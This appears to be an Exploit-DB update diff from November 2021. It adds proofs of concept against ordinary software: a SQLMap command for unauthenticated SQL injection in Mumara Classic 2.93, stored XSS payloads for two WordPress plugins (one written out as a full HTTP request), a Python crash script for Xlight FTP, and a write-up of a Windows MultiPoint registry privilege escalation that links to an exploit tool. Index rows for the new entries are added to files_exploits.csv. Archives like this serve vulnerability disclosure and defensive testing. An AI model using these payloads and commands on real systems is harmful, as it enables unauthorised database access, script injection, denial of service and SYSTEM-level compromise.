DB: 2021-11-13

5 changes to exploits/shellcodes

Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)

Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation
WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)

exploits/multiple/webapps/50518.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
+# Date: 2021-11-11
+# Exploit Author: (v0yager) Shain Lakin
+# Vendor Homepage: https://mumara.com
+# Version: <= 2.93
+# Tested on: CentOS 7
+
+-==== Vulnerability ====-
+
+An SQL injection vulnerability in license_update.php in Mumara Classic
+through 2.93 allows a remote unauthenticated attacker to execute
+arbitrary SQL commands via the license parameter.
+
+-==== POC ====-
+
+Using SQLMap:
+
+sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql

exploits/php/webapps/50514.txt

@@ -0,0 +1,37 @@
+# Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
+# Date: 11/11/2021
+# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
+# Vendor Homepage: http://www.wpsymposiumpro.com/
+# Software Link: https://wordpress.org/plugins/wp-symposium-pro/
+# Version: 2021.10
+# Tested on : Windows 10
+#Description: WP Symposium Pro version 2021.10 plugin was exposed to stored cross site scripting vulnerability due to lack of sanitizing adding forum speciality and its "name" label.
+
+#Poc:
+
+POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 129
+Origin: http://localhost
+Connection: close
+Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test
+
+
+----------------------------------------------------------------------------------
+
+
+
+## After adding new forum, click created forum and pop-up will be on the screen.

exploits/php/webapps/50515.txt

@@ -0,0 +1,18 @@
+# Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
+# Date: 11/12/2021
+# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
+# Vendor Homepage: https://accesspressthemes.com/
+# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
+# Version: 1.8.2
+# Tested on : Windows 10
+
+#Poc:
+
+1. Install Latest WordPress
+2. Install and activate AccessPress Social Icons 1.8.2
+3. Open plugin on the left frame and keep going "add new" field. Click "Choose icon indiviually" and fill other fields.
+4. Enter JavaScript payload which is mentioned below into 'icon title' field and "Add Icon to list".
+
+<img src=x onerror=confirm('xss')>
+
+4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen.

exploits/windows/dos/50516.py

@@ -0,0 +1,32 @@
+# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-12
+# Vendor Homepage: https://www.xlightftpd.com/
+# Software Link: https://www.xlightftpd.com/download/setup.exe
+# Tested Version: 3.9.3.1
+# Vulnerability Type: Buffer Overflow Local
+# Tested on OS: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)
+
+# Steps to reproduce:
+# 1. - Download and Xlight FTP
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open Xlight FTP 3.9.3.1
+# 4. - "File and Directory - Access Control List - Setup - Added users list directories
+# 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied
+# 6. - Go to Setup -> added -> Enter new Item -  Paste the characters
+# 7  - Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 550
+
+try:
+    file = open("exploit.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC not created")

exploits/windows/local/50517.txt

@@ -0,0 +1,80 @@
+# Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation
+# Date: 11/11/2021
+# Exploit Author: it
+# Vendor Homepage: https://www.microsoft.com
+# Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518
+# Version: Version 6.1 Compilation 7601 Service Pack 1
+# Tested on: Microsoft Windows MultiPoint Server 2011 - English Version
+
+Description
+Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade
+
+Vulnerable: |Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache
+
+Vulnerability Type: Privilege Escalation
+
+Tested on: Microsoft Windows MultiPoint Server 2011 - Version 6.1 Compilation 7601 Service Pack 1
+
+Language OS: English
+
+The Vulnerability
+
+Clément wrote a very useful permissions-checking tool for Windows that
+find various misconfigurations in Windows that could allow a local
+attacker to elevate their privileges. On a typical Windows 7 and
+Server 2008 R2 machine, the tool found that all local users have write
+permissions on two registry keys:
+
+HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
+
+HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
+
+These didn't immediately seem exploitable, but Clément did the legwork
+and found the Windows Performance Monitoring mechanism can be made to
+read from these keys - and eventually load the DLL provided by the
+local attacker. To most everyone's surprise, not as the local user,
+but as Local System.
+
+In short, a local non-admin user on the computer just creates a
+Performance subkey in one of the above keys, populates it with some
+values, and triggers performance monitoring, which leads to a Local
+System WmiPrvSE.exe process loading attacker's DLL and executing code
+from it.
+
+About Artiche: https://itm4n.github.io/windows-registry-rpceptmapper-eop/
+I detected that in another version of windows it is also vulnerable,
+Windows Multipoint 2011, which can affect customers who use extended
+license;
+
+I can't say if there are any other vulnerable unpublished versions
+besides the ones I've posted here
+
+How to Produce Exploitation
+
+Compile Exploit Perfusion in Visual Studio 2019 - Open Project, Make
+Release x64 and Compile.
+
+Is necessary install microsoft visual c++ redistributable on Windows
+MultiPoint 2011 for execute exploit
+
+The exploit Add Subkeys in
+
+HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
+
+HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance
+
+Library = Name of your performance DLL
+
+Open = Name of your Open function in your DLL
+
+Collect = Name of your Collect function in your DLL
+
+Close = Name of your Close function in your DLL
+
+and Exploit Write payload dll hijacking, call dll with permission SYSTEM using WMI
+
+Tools and Exploit:
+https://github.com/itm4n/PrivescCheck
+
+Exploit:
+https://github.com/itm4n/Perfusion

files_exploits.csv

@@ -6805,6 +6805,7 @@ id,file,description,date,author,type,platform,port
 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
 50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -11415,6 +11416,7 @@ id,file,description,date,author,type,platform,port
 50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple,
+50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44611,3 +44613,6 @@ id,file,description,date,author,type,platform,port
 50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
 50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
 50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,
+50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
+50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
+50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,